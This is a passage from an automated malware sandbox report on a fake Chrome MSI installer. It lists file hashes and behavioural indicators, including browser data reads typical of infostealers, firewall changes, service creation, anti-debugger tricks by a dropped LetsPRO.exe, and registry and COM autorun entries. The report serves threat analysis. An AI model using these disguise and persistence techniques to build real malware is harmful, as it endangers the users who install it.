Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
26/04/2024, 10:42
Static task
static1
Behavioral task
behavioral1
Sample
sutup-Chrome.13.26.x64.msi
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
sutup-Chrome.13.26.x64.msi
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
sutup-Chrome.13.26.x64.msi
Resource
win10v2004-20240419-en
Behavioral task
behavioral4
Sample
sutup-Chrome.13.26.x64.msi
Resource
win11-20240419-en
General
-
Target
sutup-Chrome.13.26.x64.msi
-
Size
15.6MB
-
MD5
86561e111e7ce97e13a9936b9b4ba849
-
SHA1
61cd40da9253a367e416c9ab67e73738f18948c3
-
SHA256
bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88
-
SHA512
33d26416412d777fb2758bc41b44a9e9107906879c85bb4609702242deb2bcd83ed8a5f5da7a1d3e4662ca7b31dbfbbe1faa8364952546ff600136e8c2cf7d54
-
SSDEEP
393216:qCBN2m9uaDsIqvv3/L/2m68UzYWIMWLBM36dmdRwhm7YLp:RkmqvHv1M/q8dOh
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 368 netsh.exe 2124 netsh.exe 4556 netsh.exe 2068 netsh.exe -
Sets file execution options in registry 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe GoogleUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" GoogleUpdate.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation GoogleUpdate.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
pid Process 1628 LetsPRO.exe 3772 LetsPRO.exe 1628 LetsPRO.exe 3772 LetsPRO.exe 540 LetsPRO.exe 4188 LetsPRO.exe 2204 LetsPRO.exe 540 LetsPRO.exe 2468 LetsPRO.exe 2468 LetsPRO.exe 4188 LetsPRO.exe 2204 LetsPRO.exe 1712 LetsPRO.exe 1712 LetsPRO.exe 3236 LetsPRO.exe 4672 LetsPRO.exe 3236 LetsPRO.exe 1360 LetsPRO.exe 2436 LetsPRO.exe 4672 LetsPRO.exe 2436 LetsPRO.exe 1360 LetsPRO.exe 4524 LetsPRO.exe 4524 LetsPRO.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_sr.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_bn.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_hr.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_it.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_lt.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll GoogleUpdate.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll msiexec.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_el.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_ml.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\psuser_64.dll ChromeSetup.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\psuser.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_ro.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_th.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_tr.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll GoogleUpdate.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll msiexec.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\psmachine.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_te.dll ChromeSetup.exe File opened for modification C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdateSetup.exe ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe GoogleUpdate.exe File created C:\Program Files (x86)\WeGame\beacon_sdk.dll msiexec.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_hi.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdateComRegisterShell64.exe ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_es.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_ms.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_ta.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dll GoogleUpdate.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe msiexec.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdateBroker.exe ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_fa.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll GoogleUpdate.exe File created C:\Program Files (x86)\WeGame\common.dll msiexec.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdate.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_lv.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdateSetup.exe ChromeSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_am.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_mr.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdateCore.exe ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_hu.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_ca.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_nl.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_pt-BR.dll ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\goopdateres_vi.dll ChromeSetup.exe File opened for modification C:\Program Files (x86)\Google\Temp\GUT475B.tmp ChromeSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleCrashHandler64.exe ChromeSetup.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File created C:\Windows\Installer\e5742c6.msi msiexec.exe File opened for modification C:\Windows\Installer\e5742c6.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2} msiexec.exe File opened for modification C:\Windows\Installer\MSI441D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI442E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI44DB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4588.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI45D7.tmp msiexec.exe -
Executes dropped EXE 35 IoCs
pid Process 1628 LetsPRO.exe 3772 LetsPRO.exe 3872 LetsPRO.exe 4228 LetsPRO.exe 3180 ChromeSetup.exe 1120 LetsPRO.exe 2344 LetsPRO.exe 4664 LetsPRO.exe 4336 LetsPRO.exe 540 LetsPRO.exe 4528 LetsPRO.exe 2468 LetsPRO.exe 1712 LetsPRO.exe 4188 LetsPRO.exe 2204 LetsPRO.exe 3996 LetsPRO.exe 3696 LetsPRO.exe 3236 LetsPRO.exe 2004 LetsPRO.exe 4700 LetsPRO.exe 4092 LetsPRO.exe 4524 LetsPRO.exe 2436 LetsPRO.exe 1360 LetsPRO.exe 4672 LetsPRO.exe 3324 GoogleUpdate.exe 1752 GoogleUpdate.exe 3356 GoogleUpdate.exe 4072 GoogleUpdateComRegisterShell64.exe 2804 GoogleUpdateComRegisterShell64.exe 5064 GoogleUpdateComRegisterShell64.exe 3908 GoogleUpdate.exe 1628 GoogleUpdate.exe 1788 GoogleUpdate.exe 436 GoogleUpdate.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4856 sc.exe -
Loads dropped DLL 31 IoCs
pid Process 1412 MsiExec.exe 1412 MsiExec.exe 1412 MsiExec.exe 1412 MsiExec.exe 1628 LetsPRO.exe 3772 LetsPRO.exe 540 LetsPRO.exe 4188 LetsPRO.exe 2204 LetsPRO.exe 2468 LetsPRO.exe 1712 LetsPRO.exe 3236 LetsPRO.exe 4672 LetsPRO.exe 1360 LetsPRO.exe 2436 LetsPRO.exe 3324 GoogleUpdate.exe 4524 LetsPRO.exe 1752 GoogleUpdate.exe 3356 GoogleUpdate.exe 4072 GoogleUpdateComRegisterShell64.exe 3356 GoogleUpdate.exe 2804 GoogleUpdateComRegisterShell64.exe 3356 GoogleUpdate.exe 5064 GoogleUpdateComRegisterShell64.exe 3356 GoogleUpdate.exe 3908 GoogleUpdate.exe 1628 GoogleUpdate.exe 1788 GoogleUpdate.exe 1788 GoogleUpdate.exe 1628 GoogleUpdate.exe 436 GoogleUpdate.exe -
Registers COM server for autorun 1 TTPs 33 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B50B3FA2-B519-4C16-A932-46E9FFD1D910}\InProcServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4184 1120 WerFault.exe 92 -
Kills process with taskkill 2 IoCs
pid Process 4540 taskkill.exe 3376 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28} GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher\ = "Google Update Process Launcher Class" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ = "Google Update Process Launcher Class" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods\ = "4" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods\ = "9" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}\LocalServer32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36} GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\ProgID\ = "GoogleUpdate.CoCreateAsync.1.0" GoogleUpdate.exe Key created 